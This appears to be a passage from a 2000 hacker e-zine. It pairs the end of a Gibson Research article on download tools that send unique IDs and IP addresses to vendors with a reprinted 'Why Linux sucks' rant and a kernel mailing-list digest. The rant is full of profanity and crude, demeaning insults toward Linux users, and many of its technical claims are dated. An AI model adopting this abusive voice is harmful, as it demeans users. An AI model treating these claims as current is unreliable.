                                                           Any of these file download spies may be removed through Windows' standard
                                                           Add/Remove Programs feature located in the Windows Control Panel. You
                                                           will find them listed as "Netscape SmartDownload", "RealDownload", and
                                                           "NetZip Download Demon". 



        An additional privacy risk involves whether, to what degree, and to what end, historical file downloading profiles are being compiled about individuals, whether or not they are known by name and
        address and "personally identifiable." 

        Netscape has been completely silent on this issue, whereas RealNetworks has gone absolutely ballistic over my pointing out what it has apparently lied about and what it could be doing with the data
        that has been sent to its servers. As I have repeatedly stated, I have no evidence, information, or knowledge either way. But trust is what it all boils down to, and RealNetworks' record on that score
        seems to be getting shakier with every passing day. 

                                                                     Why is a unique ID tag being transmitted at all?

        I can only address that larger question by asking: "If these companies do not care about us in any unique way   separate from everyone else (as they claim)   then WHY are they going to all the
        trouble of uniquely tagging every user's computer and deliberately transmitting not only that unique ID tag, but also   in the case of Netscape   sending the user's Internet IP address with each and
        every download file report?" This is not required for the purpose of identifying what files are downloaded "in aggregate", or learning when their downloading program is installed or removed from the
        host computer . . . contrary to what seems to be stated in their various license agreements. 

                                                                   Therefore, it is difficult to understand the motivation
                                                                  behind collecting personal data which is, on its face,
                                                                          unnecessary for the stated objective.

        One Final Observation: 

        The stated purpose behind all of this download profiling (in their respective licenses) is to inform these vendors about the files we are all (collectively) downloading so that they can provide some sort
        of additional, useful, or auxiliary information to us (this is never really made clear). Yet, the date shown for the NetZip Downloader (version 1.0.62   which was captured in the outbound TCP/IP data
        packet shown above) is December 7th of 1998. So, this data gathering has presumably been underway since before that date. That's been quite a while. 

        When does the payback for all these years of "aggregate" user profiling begin? And who receives the value? And, moreover, given the highly dynamic nature of Internet content, does the whole idea
        of collecting such data really make any sense anyway? 

        It makes one wonder what's really going on here . . . doesn't it? 




        Certainly Newsworthy . . . 

        Frankly, once all of the facts are exposed and aired, I wouldn't blame anyone for being quite upset by the whole story. We now know, with absolute certainty, that more than 14 million NetZip
        Download Demon users have been misled by the product's license agreement. And it is this deceived "asset base" which RealNetworks recently purchased. How nice. 

        So, it's hardly surprising that the online news media has picked up on and reported the news of a Class Action Lawsuit brought against Netscape/AOL over their Smart Download spyware. These
        stories provide some additional background information about the secret spying activities of these programs: 

                                                                        Wired News: Privacy Suit Targets Netscape

                                                                    ZDNet News: AOL/Netscape hit with privacy lawsuit




        Keeping Yourself Informed 

        Within hours of my confirmation of this potentially serious privacy breach, the 338,584 current members of our User-Managed eMail Notification System received a brief piece of eMail outlining my
        findings and inviting them to examine the additional resources here for additional information and interaction. 

        So, if you are a newcomer to this site and are not already a member of our eMail Notification System, you might want to consider joining (just click the link.) As detailed in our formal Privacy
        Statement, your eMail address will never be disclosed, and you are completely free to remove yourself from the system if you ever choose to. 




        For Further Discussion . . . 

        Since my recent findings   and the questions they raise   about the behavior of the Netscape/Real Networks/NetZip download utilities were first disclosed to members of our User-Managed eMail
        Notification System, that is the topic receiving intense discussion, debate, and discovery over in our online "newsletter" discussion forum. 

                                                                            news://grc.com/newsletter

        To learn more about this problem, to share your feelings and perhaps your outrage, or to learn more about detecting and removing these utilities . . . or for virtually anything related to this topic:
        Please jump over to our "Newsletter Discussion Page", and from there into the newsletter discussion forum. 

        I'm certain you'll be glad you did! 

        And thanks very much for your interest and continued support of my work! 

                  


                                                            You are encouraged to browse and perhaps participate in our
                                                             online newsletter discussion of this issue.   Or, to return
                                                              to the previous page, press your browser's BACK button.







                   

                                                               


                                                                                                          

                                                                                                                                                     

      Purchasing Info
                          
                                                 GRC Mail System
                                                                      
                                                                                             To GRC's Home
                                                                                                                 
                                                                                                                                         Tech Support
                                                                                                                                                            
                                                                                                                                                                                    Steve's Place


                                                                     The contents of this page are Copyright (c) 2000 by Gibson Research Corporation. 
                                                                     SpinRite, ChromaZone, ShieldsUP! and the iconic character "Mo" (shown above) are 
                                                                       registered trademarks of Gibson Research Corporation, Laguna Hills, CA, USA. 
                                                                        Gibson Research Corporation's GRC.COM web and customer privacy policy 
                                                                                                ~ ~ ~ 

      @HWA
      
      
312.0 [IND] Why Linux sucks.
      ~~~~~~~~~~~~~~~~~~~~~
      
      Submitted by Duro

      
      I highly recommend you visit this site, here is the general gist but there is much
      more informative material there and well worth the visit for any serious admin worth
      his salt.  - Ed
            
      http://www.spatula.net/proc/linux/index.src
      
      WHY LINUX SUCKS

      Testing? What's that? If it compiles, it is good, if it boots up, it is perfect. 
      - - Linus Torvalds 

      Welcome to the beginnings of my "why linux sucks" page. There isn't much here just yet, but there are so many reasons, both technical and non-technical, that linux sucks that this page will surely fill up quickly. 
      
           I've opened the page up to linking again...except from slashdot. 
      
      Here's a short list of Linux flaws that make it look silly: 
      
           /usr/include/linux (come on. honestly.) Lame. Nonstandard. (for the clue-deprived, this means that any code written for linux using the linux/ headers will be incompatible with all other Unix flavors.) Guess what: string.h, types.h, malloc.h, signal.h, and so-on
           don't belong in a platform-specific include directory. Hope you didn't want to port your code... 
           Neither the sigaction manpage nor the signal.h includs indicate what the system defaults are. Of course, they've put signal.h in /usr/include/linux... 
           "intro" manpages are a joke. Compare the BSD section 2 intro with the one from Linux. 
           file systems mount async by default (power outage and your fs dies) 
           Most linux users don't have pubes yet and are intolerably lame (3Y3 4m 1337 H4x0r d00d [uz 3y3 h4v3 L1Nux!) 
           Too many things in user space that belong in the kernel (nfs) 
           Too many things in the kernel that belong in user space (java) 
           No standard distribution. Linux people say this is a good thing? Try writing software or software configuration instructions when you never know how the OS is going to be laid out, or try finding the responsible party for a block of OS code, or try fixing security
           problems when they arise and you'll see that this is NOT a good thing at all. 
           no consistant pronunciation the os'es name (line-ucks? lynn-ucks?) 
           svr4? bsd? make up your mind? 
           Lame NFS & dd 
           {
           From: Alfred Perlstein 
      
      time dd if=www2_otherlocal.tar.gz of=/dev/null bs=128k
      219+1 records in
      219+1 records out
      28760021 bytes transferred in 3.411756 secs (8429683 bytes/sec)
      0.000u 0.443s 0:03.42 12.8%     91+667k 0+17io 0pf+0w  
      
      (that's freebsd)
      
      time dd if=www2_otherlocal.tar.gz of=/dev/null bs=128k
      219+1 records in
      219+1 records out
      0.010u 1.550s 0:16.00 9.7%      0+0k 0+0io 84pf+0w  
      
      (linsux)  [Redhat 5.1]
      
      this is on the same 100mbit segment.
      i'm using NFS over TCP and linux is using UDP
      both to the same Solaris 5.6 box.
      
      also, note how much linux dd sucks ass.
      
      (still smirking)
      
      Alfred Perlstein
      }
           
           #linux, #hack, #linuxwarez... 
           New kernel every week that breaks half your applications (see end of the article #breakage)
           Security flaw/Root compromise of the week (see below) 
           glibc? libc? libc5? libc6? glibc2? 
           /bin/sh != sh; /bin/sh == bash. Lame. Nonstandard. Result: broken shell scripts and nonportable code. 
           /usr/bin/make != make; /usr/bin/make == gmake. Lame. Nonstandard. Same result as above: nonportable code. 
           ext2fs 
           Linux will mount partitions that are not clean 
           can't handle partitions > 2GB (i've hear they finally fixed this one) 
           e2fsck deliberatly leaves/creates corrupt files (if there is a block that it duplicate between two files, e2fsck will clone the duplicate (while fsck will remove both files. This can also result in a user gaining unauthorized access to another user's data.)) 
           it swap likes swap to swap swap too swap often swap 
           only allows 128M of swap at a time; for a 1G of swap, you need 8 swap partitions 
           can't handle more than 1GB of RAM 
           To install Joe's program, you need Bob's kernel hack, but for Bob's kernel hack, you've got to have Suzy's patches, but Suzy's patches only work with a year-old kernel, unless you get Mike's patches to Suzy's patches, but even then, those conflict with Jeff's
           drivers, which can be resolved only by installing Nancy's patches... 
           Can't handle the same IP on more than one interface 
           Can't handle large files 
           {
           Help, mommy! I can't handle the BIG files!
      
      (names have been changed to protect the innocent) 
      
      
      qqq(4)% uname -a
      SunOS qqq.zz.xxxxx.xxx 5.6 Generic_105181-07 sun4u sparc SUNW,Ultra-2
      qqq(5)% ls -l
      total 7330114
      - -rw-r--r--   1 root     root     110622720 Oct 27 03:01 zzz.xxxxx.xxx.tar
      - -rw-r--r--   1 root     other    313320448 Oct  7 17:06 file1.tar
      - -rw-r--r--   1 root     other      5079040 Aug 16 22:33 file2.tar
      - -rw-r--r--   1 root     other    1107240960 Aug 16 22:39 file3.tar
      - -rw-r--r--   1 root     other     52045312 Oct 27 03:57 file4.tar
      - -rw-r--r--   1 root     root     2162790400 Oct 27 21:56 file5.tar
      
      
      
      wwww(36)% uname -a
      Linux wwww.zz.xxxxx.xxx 2.1.117 #4 SMP Tue Aug 25 01:37:46 EDT 1998 i686
      unknown
      wwww(37)% ls -l
      ls: file5.tar: File too large
      total 1551913
      - -rw-r--r--   1 root     root     110622720 Oct 27  1998 zzz.xxxxx.xxx.tar
      - -rw-r--r--   1 root     bin      313320448 Oct  7  1998 file1.tar
      - -rw-r--r--   1 root     root       5079040 Aug 16  1998 file2.tar
      - -rw-r--r--   1 root     root     1107240960 Aug 16  1998 file3.tar
      - -rw-r--r--   1 root     bin       52045312 Oct 27  1998 file4.tar
      }
      
           Max file size: 2GB. (*BSD: 4 Terabytes) 
           Dynamically linked root shell. Doom! 
           lilo! any boot loader that needs to have magic block numbers is wrong 
           linux icmp.h is *NOT* unix icmp.h - they're totally incompatible. 
           flatfile password files make listing large ftp directories impossible due to huge numbers of flatfile searchces. 
           password file can be non-shadowed - encrypted passwords visible to all 
           shadow.h! hahahahahahaha! 
           Slowass network code (see http://www.nfr.net/nfr/SYSTEM_NOTES.html#LinuxGeneral)
           Did I mention slowass network code? (see http://neuromancer.rmci.net/linux-vs-freebsd.html)
           Oh, also slowass network code (see http://www.spatula.net/proc/linux/localhost.src)
           Miserably pathetic threading implementation doesn't scale for shit: all threads wake up on signals (stampeding process problem). 
           L1nux c0d3rz! 
           {
           3y3 wr1t3 31337 c0d3!
      
      It's amazing how terminally clueless 31337 L1nux c0d3rz can be. Those of you who folllow Bugtraq, for example, have probably seen this bit of 31337 c0d3: 
      
      #ifdef STRANGE_BSD_BYTE_ORDERING_THING
      /* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */
      #define FIX(n) (n)
      #else /* OpenBSD 2.1, all Linux */
      #define FIX(n) htons(n)
      #endif /* STRANGE_BSD_BYTE_ORDERING_THING */
      
      Apparently these kiddies slept that day when Big and Little Endian were explained in their high school architecture classes, and also that day in their college networks class (oh wait; they're not old enough to be in college) when htons was discussed in relation to
      network byte ordering. 
      
      For you L1nux cl00b13z, you should always call htons(3) on integers you plan to stick in a network header. Htons has a platform-dependant implementation that guarantees a result in network byte order. The cl00b13 who wrote the above code not only wrote broken
      code, but also wrote code that, in effect, does absolutely nothing more than a simple call to htons(3). 
      
      Harold Gutch said it best in a comment he inserted into the "nestea" exploit, as he corrected some stupid L1nux k1dd13 c0d3: 
      (see http://www.securityfocus.com/templates/archive.pike?list=1&date=1998-04-22&msg=19980427012153.18775@foobar.franken.de)
      
      /* bsd usage works now, the original nestea.c was broken, because some braindead 
      * linsux-c0d3r was too stupid to use sendto() correctly
      */
      }
      
           LILO can't cope with kernels > 1Mb, so the kernel has to be gzipped. 
           strfry and memfrob 
           Can't cope with hard drives > 32GB 
           GPL - a license and a virus 
           Fundamental design and direction problems. It turns out that Linus is not the smartest man in the world and the saviour of all mankind. (see #fundamental at end of article)
           OS or religion? 
           UNABLE TO LOAD INTERPRETER...memory leak much? 
           This is a real Linux error message: Uhhh. NMI recieved. Dazed and Confused. Trying to cope ...such professionalism! 
           The GNU su manpage actually says this: (see http://www.freebsd.org/cgi/man.cgi?query=su&apropos=0&sektion=0&manpath=Linux+Slackware+3.1&format=html)
      
                This program does not support a "wheel group" that restricts who can su to super-user accounts, because that can help fascist system administrators hold unwarranted power over other users. 
      
           ...apparently it's better for any user to attack the root password than to offer added security. Ignorance of security is a common Linux thread. 
           vi != vi; vi == vim. vim links to X libraries. Wipe X, and now you can't use vi. Retards. 
           Still no USB support in 2000, after NetBSD and FreeBSD have had it for nearly 2 years. So much for the "million geeks" theory of rapid software development. 
      
      I don't expect this list to be up to date; Linux is impossible enough to keep up with as a user, and it's even harder to keep up with how broken and lame it is this week. In general, the further something is down the list, the newer the information is. It's almost surprising
      how much of the older items still hold true today, until you consider the fragmented and undirected development effort. 
      
      Before you wet the briefs your mommy bought for you at Target and frantically search for a link to email me something about how "it's not like that anymore" or "how dare you insult Linux! I will h4x0r you!" or other such standard Linux sycophant drivel, consider for
      a moment that I just don't give a fuck what you have to say. I understand that it can be upsetting to you to see your precious OS exposed as the garbage it is. I've heard it all before, so you can save your energy for something more complex and important to you, like
      learning how to masturbate. (you know, like see : http://www.jackinworld.com)
      
      Perhaps the greatest crime of Linux is the production of nonportable code. The Linux c0d3rz wave the free-software flag, but they're just as bad as Microsoft in making software that can run only under their OS. 
      
      Check out my favorite Linux joke. (http://www.spatula.net/proc/linux/linux.joke.src)
      Also read aard's linux joke 
      "once upon a time there was this guy who wanted to bring his products to
      the internet for sale.  so he investigated e-commerce, and scalability,
      robustness, and synergy.
      
      and he decided to run linux."
      

      -=-
      
      
      
      News Articles, Interviews, etc
      
      Throughout all of these, it's interesting to note the typical Linux kiddie reaction to proof that their OS sucks ass. It's always something like: 
      
         1.The test wasn't "fair" 
         2.What about new kernel x.y.z? 
         3.You can't expect <reasonable expectation> 
         4.The people doing the test must be mean/biased 
         5.It wasn't tuned properly 
         6.They didn't look at the latest release of Red Hat x.y! 
      
      They really seem like 4-year-olds who have just been denied a pack of gum in a grocery store. 
      
           Linux reviews are bought- not earned (http://news.tucows.com/linux/linux07072000.html)
           Bad Linux Advocacy FAQ - a must-read (http://www.softpanorama.org/OSS/bad_linux_advocacy_faq.shtml)
           Sendmail developers have discovered a big gaping hole present in ALL linux kernels up to and including 2.2.15. (http://sendmail.net/?feed=000607linuxbug)
           Security Focus statistics page. Note how only Windows NT has had more security problems than Linux. (http://www.securityfocus.com/vdb/stats.html)
           Linux loses Wall Street's interest... fancy that: Linux, it turns out, is not the greatest thing ever (http://dailynews.yahoo.com/h/zd/20000526/tc/linux_losing_its_buzz_on_wall_street_1.html)
           Another Wall Street story of Linux firms merging, hoping to actually turn a profit. Wow! (http://dailynews.yahoo.com/h/cn/20000524/tc/linux_sellers_merge_eye_profitability_1.html)
           Linux is not mature enough for high-end computing (http://dailynews.yahoo.com/h/cn/20000517/tc/commentary_market_not_ready_for_high-end_linux_systems_1.html)
           Linuxcare go spaf! (http://dailynews.yahoo.com/htx/zd/20000522/tc/can_linuxcare_stay_afloat__1.html)
           This is hella funny (http://www.overclocked.org/OCwhinux.htm)
           Alan Cox is to blame for the big gaping hole, and didn't even catch the most foolish and common of CGI mistakes. Alan Cox is one of the lead Linux kernel coders. (http://slashdot.org/comments.pl?sid=00%2F04%2F25%2F037238&cid=121&pid=0&threshold=5&mode=flat&commentsort=0#121)
           Big gaping hole in Red Hat security. Fat fucking surprise! (http://www.msnbc.com/news/399125.asp)
           Linux is marketing and hype according to this Wall Stree Journal article (http://dowjones.wsj.com/n/SB936961814325017645-d-main-c1.html)
           Linux is marketing and religion according to this ZDnet article (http://www.oreillynet.com/pub/a/freebsd/2000/03/24/bostic.html?page=2_)
           Interview with Keith Bostic including the quote "Linux and Microsoft both started from scratch, and it showed." (http://www.oreillynet.com/pub/a/freebsd/2000/03/24/bostic.html?page=2)
           ZDnet article about Linux fragmentation (http://www.zdnet.com/zdnn/stories/news/0,4586,2470425,00.html)
           Debugging is hard! let's go shopping! (http://dailynews.yahoo.com/htx/cn/20000315/tc/20000315168.html)
           Dorks. (http://biz.yahoo.com/bw/000313/ma_andover_1.html)
           The thrill is gone for Linux (http://www.zdnet.com/zdnn/stories/news/0,4586,2458906,00.html)
           Don't invest in Linux! (http://dailynews.yahoo.com/h/cn/20000229/tc/20000229058.html)
           Even the SuSe CEO says that Linux is poo (http://www.cnn.com/2000/TECH/computing/03/02/no.linux.desktop.idg/index.html)
           SCOWorld article that says, in part: 
      
                . In our tests of these operating systems, all but one of the Linux systems suffered two or more crashes during the testing period. The FreeBSD system and both SCO operating systems suffered no crashes at all. 
                (http://www.scoworld.com/jf00rdup.html)
      
           Computerworld: three UNIX systems better than Linux (http://www.computerworld.com/home/print.nsf/All/000207E972?OpenDocument&~f)
           PC Week article about how Linux is overexaggerated (http://www.zdnet.com/filters/printerfriendly/0,6061,372462-54,00.html)
           Computerworld interview with SCO's CEO calling Linux a religion. (http://www.computerworld.com/home/print.nsf/all/990426A08E)
           ZDnet article about Linux Security- and how badly it sucks ass. (http://www.zdnet.com/zdnn/stories/news/0,4586,2430772,00.html)
           Linux is Obsolete - a series of well-circulated Usenet postings in a thread started by Andy Tanenbaum, a respected Operating Systems authority. Note how Tanenbaum presents himself vs Linus having a tantrum. (http://www.educ.umu.se/~bjorn/mhonarc-files/obsolete/maillist.html)
           ZDnet article about the recent (2/14/00) Denial of Service attacks which says, in part: "The three DDoS tools in wide distribution on the Internet rely on known security vulnerabilities of Solaris and Linux." so you can thank Linux for the last wave of Denial of
           Service attacks. (http://www.zdnet.com/pcweek/stories/news/0,4153,2436770,00.html)
           JWZ's article about how linux is only free if your time has no value. For those that don't know, JWZ is a very clever guy who was deeply involved in the development of Netscape & Mozilla for some time (http://www.jwz.org/doc/linux.html)
           ZDnet review of linux as a web server, including mention of how the tcp/ip stack is broken in the 2.2 kernel, which is a perfect example of the mention above about new kernels breaking applications. (http://www.zdnet.com/devhead/stories/articles/0,4413,2258790,00.html)
           Linux: poo FreeBSD: good (http://www.idg.net/go.cgi?id=161881) (HWA runs bsd...lol - Ed)
           The Linux Myth - John Dvorak on ZDnet (http://www.zdnet.com/zdnn/stories/comment/0,5859,2338326,00.html)
           Daemon News article outlining many of the misconceptions than Linsux weenies spread about BSD. (http://www.daemonnews.org/199909/freebsd.html) (Read this too - Ed)
           Web server comparison showing that Linux is still slower than FreeBSD (http://perl.pattern.net/bench/)
           Byte Magazine article outlining how "Linux is only free if your time has no value" (http://www.byte.com/columns/Be_view/1999/06/0607Be_view.html)
           NT Magazine outlines many Linux shortcomings (http://www.ntmag.com/Magazine/Article.cfm?ArticleID=5048)
           Another NT Magazine article (http://www.ntmag.com/Magazine/Article.cfm?ArticleID=4502)
           Mindcraft says that FreeBSD outperforms Linux in this article defending their benchmarks (http://www.mindcraft.com/whitepapers/rebut-abcnews.html)
           Read what Ken Thompson has to say about Linux (http://www.spatula.net/proc/linux/thompson.src)
           FreeBSD is faster than Linux (http://www.it.fairfax.com.au/990316/openline1.html)
           NT is faster than Linux (http://www.mindcraft.com/whitepapers/nts4rhlinux.html)
           A news.com article discussing Linux shortcomings (http://news.com/News/Item/0,4,34918,00.html)
           Here's a zdnet article that details why Linux's time is over. (http://www.zdnet.com/zdnn/content/pcwk/1521/317585.html)
           NT is better than Linux (http://www.zdnet.com/pcweek/stories/columns/0,4351,377260,00.html)
           The anti-linux crusade (http://abcnews.go.com/sections/tech/FredMoody/moody981120.html)
      
      
      thanks to: urg, aard, brightmn, imperial, ee, foo, JB, cykyc 
      
      
                       
                                                                                                                  
                                                                                                                                                                                                          
       Sun Jul 30 04:31:48 EDT 2000 
                                                                                         
                                                                                                                                                                                              linux/index.src 
       Updated: Fri Jul 21 2000 1:13.15 
                                                                                         
                                                                                                                                                                                              Viewed: never 
      
      
      Copyright  1998-1999 by Nick Johnson. All rights reserved. 
      
      #breakage
      
      From http://kt.linuxcare.com/latest.epl of 2/3/2000, here is an example of the Linux API changing and generally fucking over those who develop commercial software for it. 
      
        Block Device Interface Change And Related Pain
      
      2000/01/07 - 2000/01/11 (52 posts): [ANNOUNCE] block device interfaces changes 
      
      Alexander Viro announced that the block device interface would be changing, and that some of these changes had made it into 2.3.38; he listed: 
      
              1.New type (struct block_device) is defined. We have a cache of such objects, indexed by dev_t. struct block_device * is going to replace kdev_t for block devices. Handling of the cache is done in fs/block_dev.c 
              2.They have methods (struct block_device_operations). Currently the set is { open, release, ioctl, revalidate, check_media_change }. For now (and it's going to change) types are the same as in file_operations. However, in the near future they are going to
                become 
      
                     int (*open)(struct block_device *bdev, mode_t mode, unsigned flags);
                     int (*release)(struct block_device *bdev);
                     int (*ioctl)(struct block_device *bdev, unsigned cmd, unsigned long arg);
                     int (*revalidate)(struct block_device *bdev);
                     int (*check_media_change)(struct block_device *bdev); 
      
              3.->revalidate() and ->check_media_change() disappeared from file_operations. 
              4.register_blkdev() takes block_device_operations instead of file_operations now. For one thing, it means that block devices are more or less insulated from all future changes in file_operations (Good Thing(tm)). For another, it means that drivers should be
                modified. I did the change for all drivers in the main tree, see the patch for details. It's pretty easy. 
              5.blkdev_open() doesn't change ->f_op. def_blk_fops has all needed methods (open, release and ioctl call the methods from block_device_operations, indeed). 
              6.Inodes got a new field: i_bdev. Filesystems should not worry about it - just remember to call init_special_inode() when you are initializing device/fifo/socket in-core inode (in foo_read_inode() or in foo_mknod(); all filesystems in the tree are doing it now).
                Contents of this field: pointer to struct block_device if it is a block device inode, NULL otherwise. 
              7.Superblocks got a new field: s_bdev. Handled by code in fs/super.c, points to the struct block_device if the mount is device-backed, NULL otherwise (i.e. for NFS, CODA, procfs, etc.). 
              8.do_mount() first argument is struct block_device * now. It does the right thing for non-device mounts - just pass NULL and it will work (allocate the anonymous device, etc.) 
              9.Instead of calling get_blkfops(), use ->bd_op in struct block_device. Moreover, better use blkdev_get()/blkdev_put()/ioctl_by_bdev() (see examples in mm/swapfile.c, drivers/char/raw.c, fs/super.c, fs/isofs/inode.c, fs/udf/lowlevel.c). 
             10.Thing that is probably going to happen RSN: instead of struct gendisk per major we may want to go for struct gendisk per _disk_. It would mean that at some point near ->open() we will put the pointer to it into the struct block_device. One obvious
                consequence being that partitions-related ioctls() will become completely generic. 
      
           Notice that it is _not_ the same as devfs (and not a beginning of moving devfs into the main tree). It just provides the backplane - no namespace, no nothing. Inodes (either in normal filesystems or in devfs) point to such animals. That's it. Eventually things like
           ->b_dev, ->b_rdev, ->i_dev, ->rq_dev, etc. are going to become pointers to such objects, but it will be done step-by-step - otherwise we'll end up with a moby patch and moby breakage in bargain... 
      
           Character devices are not affected at all - IMO using the same type both for block and character device was a mistake. So their handling remains as-is. Probably something should be done for them too, but that's completely different story. 
      
      Richard B. Johnson picked himself up off the floor and said: 
      
           Good grief Charley Brown! You, in a few key-strokes, just blew away major portions of the work done over the past few years by software engineers who ported their drivers to Linux. Linux will never be accepted as a 'professional' operating system if this
           continues. 
      
           It's enough of a problem putting one's job on-the-line convincing management to risk new product development to Linux. Once these products are in Production, and bugs are discovered in the OS, we must be able to get the latest version of the OS and have our
           drivers compile. If this is not possible, you do not have an operating system that is anything other than an interesting experiment. 
      
           For instance, there was a simple new change in the type of an object passed to poll and friends. This just cost me two weeks of unpaid work! Unpaid because I had to hide it. If anyone in Production Engineering had learned about this, the stuff would have been
           thrown out, the MicroCreeps would have settled in with "I told you so..", and at least three of us would have lost our jobs. 
      
           Industry is at war. You can't do this stuff to the only weapons we have. Once you claim to have a "Professional Operating System", its development must be handled in a professional way. If major kernel interface components continue to change, Linux is in a
           heap of trouble as are most all of those who are trying to incorporate it into new designs. 
      
           The industrial use of Linux is not at the desktop. It involves writing drivers for obscure things like machine controllers (read telescope controllers), Digital signal processors (read medical imaging processors), and other stuff you can't buy at the computer store. It
           doesn't matter if you fix all of Donald Becker's drivers to interface with the new kernel internals. You have still broken most everything that counts. 
      
      There were a number of replies to this. Alexander found Richard's post clueless and Monty-Pythonesque. On a serious (though annoyed) note, he explained, "one of the worst things about block drivers-to-kernel interface is that they share it with files. I.e. _any_
      change in file_operations or in struct file or in struct inode and you are deep in it. Change the size of any field prior to ->i_dev and you are in for recompile. Change <gasp> device number bitness and even recompile may be of little help. Removing those dependencies
      (not all of them are removed yet, more will follow) is going to save _your_ ass a year later." 
      
      Also replying to Richard, Victor Khimenko said, "Drivers MUST be changed with new kernel release (and thus via development branch: development kernels are just snapshots of development process after all). It was true from the start and it'll be true tomorrow. It's
      true for most OSes available. It's ESPECIALLY true for Linux where drivers are linked directly in kernel. If you expected something other then you made wrong choice choosing Linux." 
      
      Gregory Maxwell said to Richard: 
      
           We all know your position on compability. :) Many people, including myself, usually understand and agree with it. 
      
           However, you are going a little far on this one. 
      
           The change is going into 2.3.x, and that *IS* the approiate place to break interfaces. These kinds of changes should certantly not be introduced into 2.2.x. 
      
           This should cause you little difficulity, as your example of having to upgrade to fix a bug should not apply. When you upgade to fix a bug then you should just be increasing patchlevel. If there is not a patch for a bug in 2.2.x which is fixed in 2.4.x then there is a
           bug in the Linux development process. 
      
           In order to move forward, we *must* break things. To make up for this we continue to maintain old versions. There are still bugfixes being made against 2.0.x and there will be bugfixes against 2.2.x. RedHat even still issues updates against RH4.2.. 
      
           So if this were to have occured within a stable kernel version, or if it had severly affected userspace, I would agree. 
      
      Rik van Riel put it this way to Richard: 
      
           Industrial use of Linux usually doesn't involve the kernels which are marked as `development', ie. where the `middle' version number is odd and where major things are expected to change. 
      
           People venturing out on that terrain can know what they're heading into (see http://kt.linuxcare.com/) and shouldn't come whining when some actual development happens in the development branch of the kernel. The should only whine when development stops,
           not when useful changes are taking place... 
      
      But David Parsons objected to Rik, "Except, of course, that when the changes go in they are never backed out so the interfaces remain stable for the production kernels. That's the *really* annoying thing about this line of argument; when else should someone
      complain that an interface has been turned into gravel? If you wait until the development tree has become a production tree, enough code will be modified to work with the New! And! Improved! interfaces that your complaints (cf: old-style fcntl locking) will be
      dismissed sight unseen by the Core Team." He added, "The big support providers are the ones who benefit from interface churning. It's the small shops that get bitten in the ass because they don't have enough money to buy programmers or enough time to do the
      patches." There was no reply to this. 
      
      Alan also replied to Richard with the quote of the day, saying, "Linux isnt at war. War involves large numbers of people making losing decisions that harm each other in a vain attempt to lose last. Linux is about winning." 
      
      At some point, Richard posted again, having received many private emails in addition to the slew on the list. He said: 
      
           I have gotten a lot of mail on this so I will reply only once. 
      
           Many of the professional industrial uses of Unix were previously covered using Sun boards, boxes and SunOs. If you ever dial 10 before a long-distance number to get a cheaper rate, that's voice over IP and we make that stuff. This was developed on Suns,
           runs on them, but will soon be running on cheap Intel clones. 
      
           If you ever have to go to the hospital and have a CAT-Scan or a MRI, you are using equipment developed by us, even though the name on the box may be Phillips, General Electric, Toshiba, or various other companies. You can look http://www.analogic.com
           and see what we do for a living here. 
      
           The Sun driver interface has been constant. Unfortunately, you have to install it, meaning link it and reboot. When Installing a system, meaning the complete software package, the end-user's technician installs the OS from a CDROM. Then the application with
           its drivers are installed from another CDROM. This works on Suns and has been the De-facto standard way of doing things. 
      
           Linux was not suitable for the applications running on Suns until Linux provided the installable device driver. The ability to install a hardware-interface module into a kernel was my main selling point for using Linux to replace SunOs, and, indeed the whole Sun
           architecture. 
      
           Incidentally, the cost is the same. A CDROM for Solaris is essentially the same cost as a CDROM for Linux. Once you start distributing an operating system and supporting the distributors, a "free" operating system is no longer free. 
      
           By the time a decision was made to produce our new Exact Baggage Scanner, marketed by Lockheed-Martin, engineering management was dragging its feet on the use of Linux. They wanted something that was "everything to everybody", but didn't want the
           cost of using Suns. Further, it had to be completely under company control. 
      
           I was unable to convince anybody to use Linux so I had to write my own Operating System. It is called ARTOS (Analogic Realtime Operating System). Our Sky Computer Division, which produces the world's fastest (still) digital signal processor, made the
           high-speed stuff, a lowly Intel Pentium with my OS is used as the system controller, and an Alpha Workstation is used for the user interface. 
      
           When this was completed, we went on to producing our third generation CAT Scanner. This uses a Pentium as the main system controller and Linux as the operating system. The User Interface uses Windows-NT. It was felt that Linux was sufficiently
           well-hidden in the bowels of the machine so nobody would care. 
      
           The drivers in this machine comprise both block and character devices. One of major building blocks is the driver that interfaces to the Digital Signal Processor. This DSP board comprises up to 32 TMS-320C20 DSPs plus an i960 for interface. It is made by our
           CDA Division. 
      
           Completed data, available within a 32k window, a 512x512x16bit chunk, must be transferred to the User Interface within 1/4 second to make the specification. It does. 
      
           Now, our legal department has defined the criteria we must meet to use Linux. They presume that we will provide a "current distribution" of Linux to every end-user. They also defined that, since drivers may be deemed to modify the operating system, we have
           to provide driver source-code to the customer if they request it. Application code continues to be proprietary. 
      
           Changing the kernel interface to drivers is counter productive. In fact it makes the usual field installation impossible. The usual installation would automatically and transparently compile the interface modules, using the new Operating System. This is no longer
           possible because the compilation will fail. 
      
           Again, if Linux is to become other than an interesting experiment, one cannot change these interfaces without understanding the whole picture. 
      
           Distributors don't care. The more changes there are, the greater the obsolescence, the more money they make selling new boxes of CDROMs. Therefore there is no controlling negative feedback to be obtained from the distribution channel. You can reject
           what I say out-of-hand, and continue as an experiment, or you can listen and make a significant contribution to providing jobs worldwide. 
      
           It is, of course, possible to fragment Linux. A company could be started, called StableLinux that distributes only Linux n.n.n and performs bug-fixes and maintenance on that version only. This is not helpful to the greater Linux community. Instead, we need to
           minimize the changes that affect the interfaces to world-wide applications. Just as POSIX attempted to stabilize the API so that one could write "portable" code, the interface to hardware that hasn't even been invented yet has to be stable. 
      
      Chris Adams and Horst von Brand suggested that "current distribution" refered to even-numbered minor version numbers only. Horst expanded, "OK, "current distribution" means 2.2.x kernel today, and was 2.0 sometime back. It will be 2.4 in a few months time, and
      perhaps 2.6 in a year and a half. You are supposed to distribute the machine and source to drivers &c _when shipped_, I'd assume. Check the code, test it to breaking *and keep it*. Ship that to customers, and either offer upgrades to 2.4 if needed for some reason, or
      stay put." 
      
      Elsewhere, replying to Richard's original post, Jamie Lokier said, "If you need a stable API, you chose the wrong operating system. It's no secret that Linux APIs change. You can't blame the kernel developers for doing exactly what they said they will do. If you want,
      you can blame the people who incorrectly assumed the APIs would stay the same, for not investigating the obvious." And Ted added, "If you told your management that Linux kernel interfaces never change across versions, then you were sadly mistaken. However,
      the mistake is on your end, I'm afraid." 
      
      To this, Richard replied: 
      
           No. According to our Legal Department, to satisfy the GPL requirement that we provide source to the end-user, they required that we supply a "current" distribution of Linux if the end-user requests it. 
      
